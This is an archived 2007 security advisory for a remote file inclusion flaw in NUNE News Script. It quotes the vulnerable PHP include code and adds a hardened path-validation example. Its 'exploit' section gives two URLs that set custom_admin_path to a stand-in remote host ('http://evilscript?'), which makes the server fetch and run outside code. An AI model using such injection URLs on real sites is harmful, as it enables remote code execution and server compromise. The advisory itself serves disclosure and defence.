nunenews-rfi.txt

2007-01-13T00:00:00
ID PACKETSTORM:53534
Type packetstorm
Reporter XORON
Modified 2007-01-13T00:00:00

Description

                                        
                                            `-----------------------------------------------  
  
NUNE News Script (custom_admin_path) Remote File Include Vulnerability  
  
-----------------------------------------------  
  
Author: xoron  
  
-----------------------------------------------  
  
Code:  
  
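// If $custom_admin_path is set from the request (as the URLs below do),  
// it is used unchecked as the include prefix.  
if (isset($custom_admin_path))  
    $special_admin_path = $custom_admin_path;  
else  
    $special_admin_path = "news/admin";  
  
// The resulting prefix goes straight into require().  
require("$special_admin_path/config/nune.conf.php");  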
  
-----------------------------------------------  
  
3xplo!t:  
  
www.target.com/[script]/index.php?custom_admin_path=http://evilscript?  
www.target.com/[script]/archives.php?custom_admin_path=http://evilscript?  
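
A hardened form of the include shown under "Code:", as an added example (not NUNE's code and not from the advisory author). The helper name resolve_admin_config() and the demo directory layout are assumptions; the check goes slightly beyond the remote case on this page and also confines local ../ paths.

```php
<?php
// Added example, not NUNE's code: resolve the admin config path so that no
// request-supplied value can steer require() outside the install directory.
// resolve_admin_config() is a hypothetical helper name.
function resolve_admin_config(string $baseDir, string $adminPath = 'news/admin'): string
{
    // Refuse URL and stream-wrapper forms (http://, ftp://, php://, data:).
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $adminPath)) {
        throw new InvalidArgumentException('admin path must be a local relative path');
    }
    $base = realpath($baseDir);
    if ($base === false) {
        throw new RuntimeException('base directory does not exist');
    }
    // realpath() returns false for a missing file and collapses ../ segments,
    // so a prefix test on its result confines the include to $base.
    $candidate = realpath("$base/$adminPath/config/nune.conf.php");
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($candidate === false || strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('admin config not found under base directory');
    }
    return $candidate;
}

// Constructed demo: a throwaway tree plus one benign and two hostile values.
$root = sys_get_temp_dir() . '/nune_demo_' . getmypid();
mkdir("$root/news/admin/config", 0700, true);
file_put_contents("$root/news/admin/config/nune.conf.php", "<?php return ['ok' => true];");

foreach (['news/admin', 'http://example.invalid/x?', '../../../etc'] as $value) {
    try {
        $conf = require resolve_admin_config($root, $value);
        echo "$value => loaded\n";
    } catch (Exception $e) {
        echo "$value => rejected: {$e->getMessage()}\n";
    }
}

// Remove the demo tree.
unlink("$root/news/admin/config/nune.conf.php");
foreach (['news/admin/config', 'news/admin', 'news', ''] as $dir) {
    rmdir(rtrim("$root/$dir", '/'));
}
```

With allow_url_include = Off in php.ini (the default since PHP 5.2.0), PHP itself refuses the remote form; the code-level check still matters because it also blocks local path traversal.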
  
-----------------------------------------------  
  
download: http://download.sourceforge.net/nune/nune-2.0pre2.tar.gz  
  
-----------------------------------------------  
  
Greetz: str0ke, kacper, GODAttach  
  
Farewell to nukedx, take care of yourself, my friend..!  
  
-----------------------------------------------  
  
# milw0rm.com [2007-01-06]  
`